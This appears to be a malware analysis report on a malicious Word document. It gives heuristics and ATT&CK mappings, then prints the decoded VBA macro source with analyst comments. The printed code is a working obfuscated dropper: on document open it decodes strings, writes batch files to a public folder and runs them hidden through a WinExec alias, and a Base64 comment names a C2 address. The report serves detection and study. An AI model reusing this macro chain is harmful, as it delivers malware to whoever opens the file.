MALICIOUS
110
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1056.001 Input Capture: Keylogging
T1204.002 User Execution: Malicious File (delivered as a malicious attachment)
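The sample is a malicious Office document containing VBA macros. The macros include a Document_Open subroutine which appears to be obfuscated, and the report flags an attempt to monitor keystrokes using GetAsyncKeyState. Note that in the extracted source previewed below GetAsyncKeyState is only declared; no call to it is visible, so that finding rests on the declaration alone. The presence of a WinExec API reference (declared under an obfuscated alias) together with the Document_Open macro suggests an attempt to execute arbitrary code, likely to download and run a second-stage payload.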
Heuristics 5
Reference to WinExec API | high | SC_STR_WINEXEC: Reference to WinExec API
VBA macros detected | medium | 2 related findings | OLE_VBA_MACROS: Document contains VBA macro code
-
VBA polls global keyboard state (keylogger) | high | OLE_VBA_KEYLOGGER_SPYWARE: The macro declares or calls a Win32 keystroke-monitoring API (GetAsyncKeyState, SetWindowsHookEx WH_KEYBOARD, or GetKeyboardState) to capture keystrokes system-wide. No legitimate document automation polls global key state; this is the core of a VBA keylogger, usually paired with active-window capture (GetForegroundWindow) and a log file. A high-confidence spyware behaviour independent of any download / Shell evidence. Matched line in script:
Declare PtrSafe Function GetAsyncKeyState Lib "user32" (ByVal vKey As LongPtr) As Integer
Document_Open macro | low | OLE_VBA_DOCOPEN: Document_Open macro. Matched line in script:
Private Sub Document_Open()
Embedded URL | info | EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main — in document text (OLE body). This is a standard Office Open XML namespace URI, not a network indicator.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 24803 bytes |

SHA-256: 3eb6d8ff8c3a77dbdd36153a50664f8d54c38206fb7976001423159752b41424
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Document_Close event handler. Contains only filler arithmetic: TR is a cosine
' scaled by 2.5644976, so it can never equal 12.3456 and the MsgBox branch is
' unreachable. No file, process or network action is performed here.
Private Sub Document_Close()
Dim TR As Double
TR = 2.5644976 * Cos(2.48345034194 + 26.3453)
' Opaque predicate: |TR| <= 2.5644976, so this comparison is always False.
If TR = 12.3456 Then MsgBox ("impossible")
End Sub
' Document_New event handler. Computes two throwaway floating-point values into
' a local variable and discards them; it makes no call and has no side effect.
' NOTE(review): looks like filler intended to make the module resemble ordinary
' document code.
Private Sub Document_New()
Dim u As Double
u = 4.710144 * Sqr(Abs(36.4562))
u = 0.814976 * Cos(2.45034194) - u
End Sub
' Document_Open event handler: the host application runs it automatically when
' the document is opened with macros enabled, so this is the entry point of the
' chain. Its only real action is the call into hcvkf2kj.cvwjvgj2345RR.
Private Sub Document_Open()
Dim TR As Double
' Filler arithmetic; the value only feeds the numeric argument passed below.
TR = 2.5644976 * Cos(2.48345034194 + 26.3453)
' Hands control to the worker routine in module hcvkf2kj. The Double passed
' here arrives there as parameter T, which that routine uses only inside
' trigonometric expressions.
hcvkf2kj.cvwjvgj2345RR TR - 4.76507144 * Sin(1 + 0.048)
End Sub
Attribute VB_Name = "hcvkf2kj"
' Execution wrapper. Joins jhf, a single space and jsu3 into one command line
' and passes it to zzxmnkj325.lgklj4ksd, which module zzxmnkj325 declares as an
' alias for kernel32 WinExec. The second argument 0 is the WinExec show-window
' value (SW_HIDE), so the started process has no visible window.
'   iefj, shkjw - never read; call sites pass arbitrary numbers for them.
'   jhf         - program or file to start.
'   jsu3        - argument string appended after a space (may be empty).
' Detection note: every call results in a child process created directly by the
' Office host process.
Private Sub vnkw3j2k4(iefj As Integer, jhf As String, shkjw As Double, jsu3 As String)
' Filler: the caption is set and then compared with a different literal, so the
' MsgBox presumably never shows (assumes Caption returns the value just set).
fhejr3.Label2.Caption = "cvbnkw3 34j23 334/546"
If fhejr3.Label2.Caption = "result" Then MsgBox ("message")
' The only meaningful statement: WinExec(jhf & " " & jsu3, 0).
zzxmnkj325.lgklj4ksd jhf + " " + jsu3, 0
' Overwrites the caption again; later comparisons against this caption in
' cvwjvgj2345RR only act as always-true conditions.
fhejr3.Label2.Caption = "345 785 235" & fhejr3.Label2.Tag + "345"
End Sub
' String decoder used for the obfuscated literals in this module.
' Algorithm as written: slen = Len(nfk4) / 3; the first loop copies the
' characters at positions 3, 6, 9, ... of the input into res; the second loop
' writes res back to front into the return value. Two of every three input
' characters are padding and are discarded.
'   dre  - never read; call sites pass a different number each time.
'   nfk4 - obfuscated literal.
' Returns the decoded string (slen characters).
' T and i are not declared in this function or in the visible part of the
' module, so they are presumably implicit Variants (T empty, treated as 0 in
' the arithmetic) - TODO confirm there is no Option Explicit / module-level T.
' Every assignment to BZDF456SWGwtgw354 is filler that does not feed the
' result; its only use is the opaque predicate in the second loop.
Public Function vk3FFAWewg345SDGF(dre As Long, nfk4 As String) As String
Dim BZDF456SWGwtgw354 As Double
BZDF456SWGwtgw354 = 0#
Dim slen As Long
Dim src As String
Dim res As String
src = nfk4
' "/" is floating-point division; the quotient is converted to Long on
' assignment. The literals on this page have lengths that are multiples of 3.
slen = Len(src) / 3
res = Space$(slen)
Dim FGH654 As Long
vk3FFAWewg345SDGF = Space$(slen)
Dim HJ6 As String
Dim sdf As String
' Pass 1: keep every third character of the input.
For i = 1 To slen
BZDF456SWGwtgw354 = BZDF456SWGwtgw354 - 3.046294199 * Sin(8.48548954 + 175.80631484 * T)
Mid$(res, i, 1) = Mid$(src, i * 3, 1)
Next
BZDF456SWGwtgw354 = BZDF456SWGwtgw354 - 3.046294199 * Sin(8.48548954 + 175.80631484 * T)
' sdf starts as slen spaces (the function's current return value).
sdf = vk3FFAWewg345SDGF
' Pass 2: reverse res into sdf, one character per iteration.
For i = 1 To slen
FGH654 = slen - i + 1
HJ6 = Mid$(res, FGH654, 1)
Dim dfke As String
Dim i34 As Integer
BZDF456SWGwtgw354 = BZDF456SWGwtgw354 + 9.000030263 * Cos(1.920745251 + 71.7572 * T)
i34 = 1
dfke = ""
BZDF456SWGwtgw354 = BZDF456SWGwtgw354 + 7.00303 * Cos(1.9207251 + 1.752 * T)
' dfke is "" and i34 is 1, so this writes the single character HJ6 at
' position i. NOTE(review): the <> 9.99 test looks like an opaque predicate
' that is expected to be True on every iteration - confirm.
If BZDF456SWGwtgw354 <> 9.99 Then Mid$(sdf, i, i34) = dfke & HJ6
Next
vk3FFAWewg345SDGF = sdf
BZDF456SWGwtgw354 = BZDF456SWGwtgw354 - 7.00054259 * Cos(345.234954 + 56.0034584 * T)
End Function
' Worker routine reached from Document_Open. Visible sequence:
'   1. decode a base path and a file name, write a decoded string to that file
'      (file #1) and start the file through vnkw3j2k4 (WinExec, hidden window);
'   2. spin until a decoded path exists on disk;
'   3. build two longer decoded strings in fhejr3.Tag / fhejr3.Caption and start
'      a decoded command with fhejr3.Caption as its argument string;
'   4. write fhejr3.Tag to a second file (file #3) and start that file as well.
' fhejr3 is an object exposing Label1/Label2, Tag and Caption (presumably a
' UserForm); its properties are used purely as string storage.
' T is used only inside trigonometric expressions. R is not declared in the
' visible code (presumably an implicit empty Variant).
' Decoded values quoted in the comments below were obtained by applying the
' stride-3/reverse rule of vk3FFAWewg345SDGF by hand to the literals on this
' page - verify against a sandbox run before using them as indicators.
' Detection note: the observable behaviour is an Office process writing script
' files under a user-writable directory and spawning child processes.
Public Sub cvwjvgj2345RR(T As Double)
fhejr3.Label2.Caption = "98"
' Dead branch: the caption was just set to "98", so the "34" test presumably
' never succeeds and Application.Quit is not reached here.
If fhejr3.Label2.Caption = "34" Then
MsgBox ("345")
Application.Quit
End If
' Base directory; decodes to C:\Users\Public\
fhejr3.Label1.Caption = vk3FFAWewg345SDGF(2, "WZ\34cp9iPGlf4b&(uVBP[#\,;sXnrQve{ts&+U//\4J:yBC")
' Full path of the first dropped file; the appended name decodes to hg32j.bat
fhejr3.Label1.Tag = fhejr3.Label1.Caption + vk3FFAWewg345SDGF(3, "+ctIia0fbb;.zzj2~2-#3Ssg$Qh")
Open fhejr3.Label1.Tag For Binary As #1
' File content; decodes to: cmd /c mkdir C:\Users\Public\kjh4ek
Put #1, , vk3FFAWewg345SDGF(4, "P<k$ke3J4%4h1HjoukM(\V?c%Fip8lSgb!Tun<Pn]\~BsMgr>0eo[s_1Urq\_R:oTC%L zZr0%i#RdlHk-dmV9 Mjc<;/XF QId+DmPyc")
Close #1
' Starts the file just written (WinExec with an empty argument string).
vnkw3j2k4 2, fhejr3.Label1.Tag, 0.4, ""
' Busy-wait with no timeout until the path below exists; the literal decodes to
' C:\Users\Public\kjh4ek, i.e. the directory the first file creates.
Do While Dir(vk3FFAWewg345SDGF(5, ".Bk$Zes^4+KhT}jc/k1f\Wrc+5i8sl+lbk$uC<PAE\n%s-@r3$exnsafU)=\tk:YbC"), vbDirectory) = ""
Loop
' First part of the content later written to file #3 (decoded string, not
' expanded here).
fhejr3.Tag = vk3FFAWewg345SDGF(6, "kP %~TXh/Ns !AYNv 1WD6o/T> !;NrE/q/ P/Yj5 iNC|e/]A u^eLsc63iPQo36h=-c5# ZICr%/Y] wre3!x2GeTh.$4d5~m(nc1{\:42#e39.mCZeCqtk{s=$yoDShh\7_sXOwLBoQTdoDn%Ci_,W[#\B<:lgC")
' Longest decoded string in the sample (not expanded here); it is passed below
' as the argument string of the second WinExec call.
fhejr3.Caption = vk3FFAWewg345SDGF(8, "~B)Mg)>0)o['_1lrqh_RXoTZ%LuzZM0%G#RblHh-dNV9GMjX<;jXFlQIG+DbPyi.BV$ZHs^U+KcT}Nc/n1fcWrl+5N8sX+lVk$cC<pAEzn%Q-@'3$(xngafn)=itkrYbtkPS%~4Xh6Nse!AsNva1WB6omT>o!;rrEFq/:P/:j5]iNt|er]Aeu^vLsn63oPQC36.=-m5#eZItr%sY]ywrS3![2G(Thg$4n5~i(nr1{t:4S#et9.eCZGCq.k{I=$IoDChhS7_AXO:LB:QT]oDg%Cn_,i[#dB<olgc*Vn4,Eh[.8DtjTxuAe;YT9k.SImT*eUIt~Ws4Kyb@Sj5[{S $T,I*)YG),6'qI=m$=,4AdEcf7om+B{3n#=Lbl6@5pug2p5NFDZH8R()1V4Y(]vn6tKxmm=QgN01BsXukCkb)mvA*U]*D$4NH=uv{UvwTX?NfhyVM4jxS}vOnl5|h4efiE:MKN5<-EW+z~KLxavV,oKwD2xc~<0N}Rb<H3*a1n'uI(aMgh8n=gi)9r~(tW~Sn~4%&6d{e7@siYa<fBznm.5oA;rH!Fuo:wV:]k]]Oth&rp.e&{vtPna%okKCC?.dxmrweo5t}<ss&y78S:P[;9(o6gZMn<Xi1WrxKtGdS(stgJe2gGso.7PI3!IO~CK-S2sA<[:J?:r]]1Og5@neAixLd]@o%]cJKn]CEJZ.G%t$%x$neszT0:.HVmk:esVt8Ns~iyhhSdG[C!(nKeg0l#si~4F8XdjXae.oQ>l%Wn0~wHJoe)Dpf.C*)tDtSbnOUe4%iKFl+<C5/bfZe{JWCA.c4tJcedPN=| K#t4)c[1e3hj*Qb22OZ)-0FwbyeFvN^H({l #6d}qnW]a&>ms]m(,o+}C6r-5y x%l*pl@Reh)h=lsC1rR^er#w/bo7~pqg z0C+Y/")
' NOTE(review): the next comment is Base64 text left in the macro source. It
' decodes to hxxp://144[.]91[.]79[.]6/api[.]php (defanged) - a candidate network
' indicator; being a comment, it is not executed by any statement here.
' aHR0cDovLzE0NC45MS43OS42L2FwaS5waHA=
fhejr3.Label2.Tag = "98"
fhejr3.Label2.Caption = fhejr3.Label2.Tag + "dfw"
' Second WinExec call: decoded program path, a space, then fhejr3.Caption.
vnkw3j2k4 4, vk3FFAWewg345SDGF(8, "tDeSbxOUe4%.KFd+<m5/cfZ\{J2CA3c4mJcedPt=|sK#y4)S[1\3hs*Qw22oZ)d0FnbyiFvW^H\{l:#6C"), 5.23, fhejr3.Caption
Dim HRD456ESWTG As Double
HRD456ESWTG = 0#
HRD456ESWTG = HRD456ESWTG + 4.7650710144 * Cos(1 + 0.02 * T)
' Path of the second dropped file: base directory plus a decoded file name.
fhejr3.Label1.Tag = fhejr3.Label1.Caption + vk3FFAWewg345SDGF(10, "HJte)apfbC*.tDhSb4OU34%jKFd+<n5/\fZk{JeCA4c4hJcjdPk")
HRD456ESWTG = 3.00199 * Cos(5.23487 + 3.0348 * T / 2) - 1.04534199 * Sin(6.45634 + 15.80084 * T * 2) + R
' Label2.Caption is never set to "apple" in the visible code, so the file is
' presumably always opened.
If fhejr3.Label2.Caption <> "apple" Then Open fhejr3.Label1.Tag For Binary As #3
' Appends the literal "50 & " and one more decoded string, then writes the
' whole of fhejr3.Tag to file #3.
fhejr3.Tag = fhejr3.Tag + "50 & " & vk3FFAWewg345SDGF(12, "0FebyxFve^H.{lc#6l}qaW]c&>\s]c(,i+}l6rb5yux%P*p\@Rsh)r=leC1sR^Ur#\/b:7~C")
Put #3, , fhejr3.Tag
Dim QW345DSFG5 As Double
Dim Mercury_L02 As Double
QW345DSFG5 = 0#
' Control-flow padding around a single Close #3: Label2.Caption is never
' "aqm34" in the visible code, and QW345DSFG5 is on the order of 1e-8 when it
' is compared with 12.34567, so Close #3 runs on the first loop iteration.
If fhejr3.Label2.Caption <> "aqm34" Then
QW345DSFG5 = QW345DSFG5 + 0.00000001239 * Cos(0.8328616637 + 55618.3812281138 * T)
For i = 1 To 4
QW345DSFG5 = QW345DSFG5 + 0.00000001254 * Cos(2.24332680768 + 12188.730898597 * T)
If i = 1 Then
If QW345DSFG5 <> 12.34567 Then
Close #3
Else
QW345DSFG5 = Sin(2.15445290383 + 39.48438752 * T)
End If
End If
Next
QW345DSFG5 = Cos(5.72285490406 + 24176.703658357 * T) * 0.2 + QW345DSFG5
Else
Dim stj As String
QW345DSFG5 = QW345DSFG5 - 0.0000124 * Cos(4.22680768 + 1628.798597 * T)
stj = "ok"
If stj = "12" Then MsgBox (stj)
End If
' Unused string filler.
Dim df345 As String
df345 = "3427864"
df345 = df345 & "098"
' Third WinExec call: starts the second dropped file with no arguments.
vnkw3j2k4 623, fhejr3.Label1.Tag, Sin(25), ""
' Left commented out by the author, so the host application stays open.
'Application.Quit
End Sub
Attribute VB_Name = "fhejr3"
Attribute VB_Base = "0{F0B0D4B2-D263-4609-B4CA-DAD5BC46989E}{BF1B753A-04E3-4E55-B919-0672F95D9029}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "zzxmnkj325"
' Win32 API declarations, split on the VBA7 compile-time constant (PtrSafe and
' LongPtr for VBA7 hosts, plain Long otherwise). In the listing shown on this
' page the only declaration called from the other modules is lgklj4ksd, the
' kernel32 WinExec alias further down; none of the user32 entries is referenced
' by a visible procedure, so they look like padding around that one import -
' TODO confirm against the full extracted file.
' Several parameter names are random strings (sfawerq345qwf, fkjn54lk4nlws,
' cbkjwhefkjhv4j3rhvw), unlike the conventional names on the other lines.
' Mitigation note: API declarations from macros are what the Defender attack
' surface reduction rule "Block Win32 API calls from Office macros" targets.
#If VBA7 Then
Declare PtrSafe Function DdeFreeStringHandle Lib "user32" (ByVal idInst As LongPtr, ByVal hsz As LongPtr) As LongPtr
Declare PtrSafe Function DefDlgProc Lib "user32" Alias "DefDlgProcA" (ByVal hDlg As LongPtr, ByVal wMsg As LongPtr, ByVal wParam As LongPtr, ByVal lParam As LongPtr) As LongPtr
Declare PtrSafe Function DeferWindowPos Lib "user32" (ByVal hWinPosInfo As LongPtr, ByVal hWnd As LongPtr, ByVal hWndInsertAfter As LongPtr, ByVal x As LongPtr, ByVal y As LongPtr, ByVal cx As LongPtr, ByVal cy As LongPtr, ByVal wFlags As LongPtr) As LongPtr
Declare PtrSafe Function DestroyAcceleratorTable Lib "user32" (ByVal haccel As LongPtr) As LongPtr
Declare PtrSafe Function DdeDisconnect Lib "user32" (ByVal sfawerq345qwf As LongPtr) As LongPtr
Declare PtrSafe Function DdeDisconnectList Lib "user32" (ByVal hConvList As LongPtr) As LongPtr
Declare PtrSafe Function DdeEnableCallback Lib "user32" (ByVal idInst As LongPtr, ByVal hConv As LongPtr, ByVal wCmd As LongPtr) As LongPtr
Declare PtrSafe Function DdeFreeDataHandle Lib "user32" (ByVal hData As LongPtr) As LongPtr
Declare PtrSafe Function DestroyCaret Lib "user32" () As LongPtr
Declare PtrSafe Function DestroyCursor Lib "user32" (ByVal hCursor As LongPtr) As LongPtr
Declare PtrSafe Function DestroyIcon Lib "user32" (ByVal hIcon As LongPtr) As LongPtr
Declare PtrSafe Function ActivateKeyboardLayout Lib "user32" (ByVal fkjn54lk4nlws As LongPtr, ByVal cbkjwhefkjhv4j3rhvw As LongPtr) As LongPtr
Declare PtrSafe Function AnyPopup Lib "user32" () As LongPtr
Declare PtrSafe Function AttachThreadInput Lib "user32" (ByVal idAttach As LongPtr, ByVal idAttachTo As LongPtr, ByVal fAttach As LongPtr) As LongPtr
Declare PtrSafe Function CopyIcon Lib "user32" (ByVal hIcon As LongPtr) As LongPtr
Declare PtrSafe Function DestroyMenu Lib "user32" (ByVal hMenu As LongPtr) As LongPtr
Declare PtrSafe Function DestroyWindow Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function DlgDirSelectComboBoxEx Lib "user32" Alias "DlgDirSelectComboBoxExA" (ByVal hWndDlg As LongPtr, ByVal lpszPath As String, ByVal cbPath As LongPtr, ByVal idComboBox As LongPtr) As LongPtr
Declare PtrSafe Function CreateMDIWindow Lib "user32" Alias "CreateMDIWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String, ByVal dwStyle As LongPtr, ByVal x As LongPtr, ByVal y As LongPtr, ByVal nWidth As LongPtr, ByVal nHeight As LongPtr, ByVal hWndParent As LongPtr, ByVal hInstance As LongPtr, ByVal lParam As LongPtr) As LongPtr
Declare PtrSafe Function CreateMenu Lib "user32" () As LongPtr
Declare PtrSafe Function CreatePopupMenu Lib "user32" () As LongPtr
Declare PtrSafe Function CreateWindow Lib "user32" Alias "CreateWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String, ByVal dwStyle As LongPtr, ByVal x As LongPtr, ByVal y As LongPtr, ByVal nWidth As LongPtr, ByVal nHeight As LongPtr, ByVal hWndParent As LongPtr, ByVal hMenu As LongPtr, ByVal hInstance As LongPtr, lpParam As Any) As LongPtr
Declare PtrSafe Function DrawMenuBar Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function BringWindowToTop Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function CloseDesktop Lib "user32" (ByVal hDesktop As LongPtr) As Boolean
Declare PtrSafe Function EndDeferWindowPos Lib "user32" (ByVal hWinPosInfo As LongPtr) As LongPtr
Declare PtrSafe Function GetClassName Lib "user32" Alias "GetClassNameA" (ByVal hWnd As LongPtr, ByVal lpClassName As String, ByVal nMaxCount As LongPtr) As LongPtr
Declare PtrSafe Function GetClassWord Lib "user32" (ByVal hWnd As LongPtr, ByVal nIndex As LongPtr) As LongPtr
Declare PtrSafe Function GetClipboardData Lib "user32" Alias "GetClipboardDataA" (ByVal wFormat As LongPtr) As LongPtr
Declare PtrSafe Function GetClipboardFormatName Lib "user32" Alias "GetClipboardFormatNameA" (ByVal wFormat As LongPtr, ByVal lpString As String, ByVal nMaxCount As LongPtr) As LongPtr
Declare PtrSafe Function GetClipboardOwner Lib "user32" () As LongPtr
Declare PtrSafe Function FreeDDElParam Lib "user32" (ByVal msg As LongPtr, ByVal lParam As LongPtr) As LongPtr
Declare PtrSafe Function GetActiveWindow Lib "user32" () As LongPtr
' This is the line matched by the keylogger heuristic. It is declared only in
' this VBA7 branch (the #Else branch has no GetAsyncKeyState), and no procedure
' in the visible listing calls it.
Declare PtrSafe Function GetAsyncKeyState Lib "user32" (ByVal vKey As LongPtr) As Integer
' Continuation of the VBA7 declaration list. Apart from the WinExec alias
' marked below, none of these user32 functions is called by a procedure in the
' visible listing.
Declare PtrSafe Function DlgDirSelectEx Lib "user32" Alias "DlgDirSelectExA" (ByVal hWndDlg As LongPtr, ByVal lpszPath As String, ByVal cbPath As LongPtr, ByVal idListBox As LongPtr) As LongPtr
Declare PtrSafe Function CopyImage Lib "user32" (ByVal Handle As LongPtr, ByVal un1 As LongPtr, ByVal n1 As LongPtr, ByVal n2 As LongPtr, ByVal un2 As LongPtr) As LongPtr
Declare PtrSafe Function CountClipboardFormats Lib "user32" () As LongPtr
Declare PtrSafe Function CreateCaret Lib "user32" (ByVal hWnd As LongPtr, ByVal hBitmap As LongPtr, ByVal nWidth As LongPtr, ByVal nHeight As LongPtr) As LongPtr
Declare PtrSafe Function DrawIcon Lib "user32" (ByVal hDC As LongPtr, ByVal x As LongPtr, ByVal y As LongPtr, ByVal hIcon As LongPtr) As LongPtr
Declare PtrSafe Function DrawIconEx Lib "user32" (ByVal hDC As LongPtr, ByVal xLeft As LongPtr, ByVal yTop As LongPtr, ByVal hIcon As LongPtr, ByVal cxWidth As LongPtr, ByVal cyWidth As LongPtr, ByVal istepIfAniCur As LongPtr, ByVal hbrFlickerFreeDraw As LongPtr, ByVal diFlags As LongPtr) As Boolean
Declare PtrSafe Function GetCapture Lib "user32" () As LongPtr
Declare PtrSafe Function GetCaretBlinkTime Lib "user32" () As LongPtr
Declare PtrSafe Function GetClassLong Lib "user32" Alias "GetClassLongA" (ByVal hWnd As LongPtr, ByVal nIndex As LongPtr) As LongPtr
Declare PtrSafe Function ExcludeUpdateRgn Lib "user32" (ByVal hDC As LongPtr, ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function ExitWindows Lib "user32" (ByVal dwReserved As LongPtr, ByVal uReturnCode As LongPtr) As LongPtr
Declare PtrSafe Function ExitWindowsEx Lib "user32" (ByVal uFlags As LongPtr, ByVal dwReserved As LongPtr) As LongPtr
Declare PtrSafe Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As LongPtr
Declare PtrSafe Function SetDlgItemInt Lib "user32" (ByVal hDlg As LongPtr, ByVal nIDDlgItem As LongPtr, ByVal wValue As LongPtr, ByVal bSigned As LongPtr) As LongPtr
Declare PtrSafe Function SetDlgItemText Lib "user32" Alias "SetDlgItemTextA" (ByVal hDlg As LongPtr, ByVal nIDDlgItem As LongPtr, ByVal lpString As String) As LongPtr
Declare PtrSafe Function SetDoubleClickTime Lib "user32" (ByVal wCount As LongPtr) As LongPtr
Declare PtrSafe Function SetFocus Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function SetForegroundWindow Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function SetMenu Lib "user32" (ByVal hWnd As LongPtr, ByVal hMenu As LongPtr) As LongPtr
Declare PtrSafe Function SetMenuContextHelpId Lib "user32" (ByVal hMenu As LongPtr, ByVal dw As LongPtr) As Boolean
Declare PtrSafe Function GetKeyState Lib "user32" (ByVal nVirtKey As LongPtr) As Integer
Declare PtrSafe Function GetLastActivePopup Lib "user32" (ByVal hwndOwnder As LongPtr) As LongPtr
Declare PtrSafe Function GetMenu Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function GetClipboardViewer Lib "user32" () As LongPtr
Declare PtrSafe Function SetClipboardData Lib "user32" Alias "SetClipboardDataA" (ByVal wFormat As LongPtr, ByVal hMem As LongPtr) As LongPtr
Declare PtrSafe Function SetClipboardViewer Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function SetCursor Lib "user32" (ByVal hCursor As LongPtr) As LongPtr
Declare PtrSafe Function SetCursorPos Lib "user32" (ByVal x As LongPtr, ByVal y As LongPtr) As LongPtr
Declare PtrSafe Function GetMenuCheckMarkDimensions Lib "user32" () As LongPtr
Declare PtrSafe Function GetMenuItemCount Lib "user32" (ByVal hMenu As LongPtr) As LongPtr
Declare PtrSafe Function GetQueueStatus Lib "user32" (ByVal fuFlags As LongPtr) As LongPtr
Declare PtrSafe Function GetScrollPos Lib "user32" (ByVal hWnd As LongPtr, ByVal nBar As LongPtr) As LongPtr
Declare PtrSafe Function GetScrollRange Lib "user32" (ByVal hWnd As LongPtr, ByVal nBar As LongPtr, lpMinPos As LongPtr, lpMaxPos As LongPtr) As LongPtr
Declare PtrSafe Function GetTabbedTextExtent Lib "user32" Alias "GetTabbedTextExtentA" (ByVal hDC As LongPtr, ByVal lpString As String, ByVal nCount As LongPtr, ByVal nTabPositions As LongPtr, lpnTabStopPositions As LongPtr) As LongPtr
Declare PtrSafe Function GetThreadDesktop Lib "user32" (ByVal dwThread As LongPtr) As LongPtr
Declare PtrSafe Function GetTopWindow Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function GetUpdateRgn Lib "user32" (ByVal hWnd As LongPtr, ByVal hRgn As LongPtr, ByVal fErase As LongPtr) As LongPtr
Declare PtrSafe Function SetWindowRgn Lib "user32" (ByVal hWnd As LongPtr, ByVal hRgn As LongPtr, ByVal bRedraw As Boolean) As LongPtr
Declare PtrSafe Function SetWindowsHook Lib "user32" Alias "SetWindowsHookA" (ByVal nFilterType As LongPtr, ByVal pfnFilterProc As LongPtr) As LongPtr
Declare PtrSafe Function SwapMouseButton Lib "user32" (ByVal bSwap As LongPtr) As LongPtr
Declare PtrSafe Function SetActiveWindow Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function SetCapture Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function GetDC Lib "user32" (ByVal hWnd As LongPtr) As LongPtr
Declare PtrSafe Function GetDCEx Lib "user32" (ByVal hWnd As LongPtr, ByVal hrgnclip As LongPtr, ByVal fdwOptions As LongPtr) As LongPtr
Declare PtrSafe Function GetDesktopWindow Lib "user32" () As LongPtr
Declare PtrSafe Function GetFocus Lib "user32" () As LongPtr
Declare PtrSafe Function GetForegroundWindow Lib "user32" () As LongPtr
Declare PtrSafe Function GetKeyboardLayout Lib "user32" (ByVal dwLayout As LongPtr) As LongPtr
Declare PtrSafe Function SetMenuDefaultItem Lib "user32" (ByVal hMenu As LongPtr, ByVal uItem As LongPtr, ByVal fByPos As LongPtr) As Boolean
' The one declaration the visible code actually uses: kernel32 WinExec exposed
' under the meaningless name lgklj4ksd, and the only Public entry in this list,
' so other modules can call it. vnkw3j2k4 in module hcvkf2kj invokes it with a
' command line and show value 0. The Alias string "WinExec" is still plain
' text, which is what the SC_STR_WINEXEC heuristic matches.
Public Declare PtrSafe Function lgklj4ksd Lib "kernel32" Alias "WinExec" (ByVal hti43 As String, ByVal vnjk3j As LongPtr) As Long
Declare PtrSafe Function SetMenuItemBitmaps Lib "user32" (ByVal hMenu As LongPtr, ByVal nPosition As LongPtr, ByVal wFlags As LongPtr, ByVal hBitmapUnchecked As LongPtr, ByVal hBitmapChecked As LongPtr) As LongPtr
Declare PtrSafe Function GetDlgItemInt Lib "user32" (ByVal hDlg As LongPtr, ByVal nIDDlgItem As LongPtr, ByVal lpTranslated As LongPtr, ByVal bSigned As LongPtr) As LongPtr
Declare PtrSafe Function GetDoubleClickTime Lib "user32" () As LongPtr
Declare PtrSafe Function GetKeyboardLayoutName Lib "user32" Alias "GetKeyboardLayoutNameA" (ByVal pwszKLID As String) As LongPtr
Declare PtrSafe Function GetUserObjectInformation Lib "user32" Alias "GetUserObjectInformationA" (ByVal hObj As LongPtr, ByVal nIndex As LongPtr, pvInfo As Any, ByVal nLength As LongPtr, lpnLengthNeeded As LongPtr) As Boolean
Declare PtrSafe Function GetWindow Lib "user32" (ByVal hWnd As LongPtr, ByVal wCmd As LongPtr) As LongPtr
Declare PtrSafe Function SetMessageExtraInfo Lib "user32" (ByVal lParam As LongPtr) As LongPtr
Declare PtrSafe Function SetCaretBlinkTime Lib "user32" (ByVal wMSeconds As LongPtr) As LongPtr
Declare PtrSafe Function SetCaretPos Lib "user32" (ByVal x As LongPtr, ByVal y As LongPtr) As LongPtr
Declare PtrSafe Function SetClassLong Lib "user32" Alias "SetClassLongA" (ByVal hWnd As LongPtr, ByVal nIndex As LongPtr, ByVal dwNewLong As LongPtr) As LongPtr
Declare PtrSafe Function SetClassWord Lib "user32" (ByVal hWnd As LongPtr, ByVal nIndex As LongPtr, ByVal wNewWord As LongPtr) As LongPtr
' Non-VBA7 branch: the same pattern with Long in place of LongPtr and no
' PtrSafe keyword. The set of user32 functions differs from the VBA7 branch
' (for example, GetAsyncKeyState is absent here), but the WinExec alias
' lgklj4ksd is declared in both, so the execution path works on either host.
#Else
Declare Function CloseWindow Lib "user32" (ByVal hWnd As Long) As Long
Declare Function GetDialogBaseUnits Lib "user32" () As Long
Declare Function GetDlgCtrlID Lib "user32" (ByVal hWnd As Long) As Long
Declare Function GetDlgItem Lib "user32" (ByVal hDlg As Long, ByVal nIDDlgItem As Long) As Long
Declare Function GetDlgItemInt Lib "user32" (ByVal hDlg As Long, ByVal nIDDlgItem As Long, ByVal lpTranslated As Long, ByVal bSigned As Long) As Long
Declare Function GetDlgItemText Lib "user32" Alias "GetDlgItemTextA" (ByVal hDlg As Long, ByVal nIDDlgItem As Long, ByVal lpString As String, ByVal nMaxCount As Long) As Long
Declare Function GetClipboardFormatName Lib "user32" Alias "GetClipboardFormatNameA" (ByVal wFormat As Long, ByVal lpString As String, ByVal nMaxCount As Long) As Long
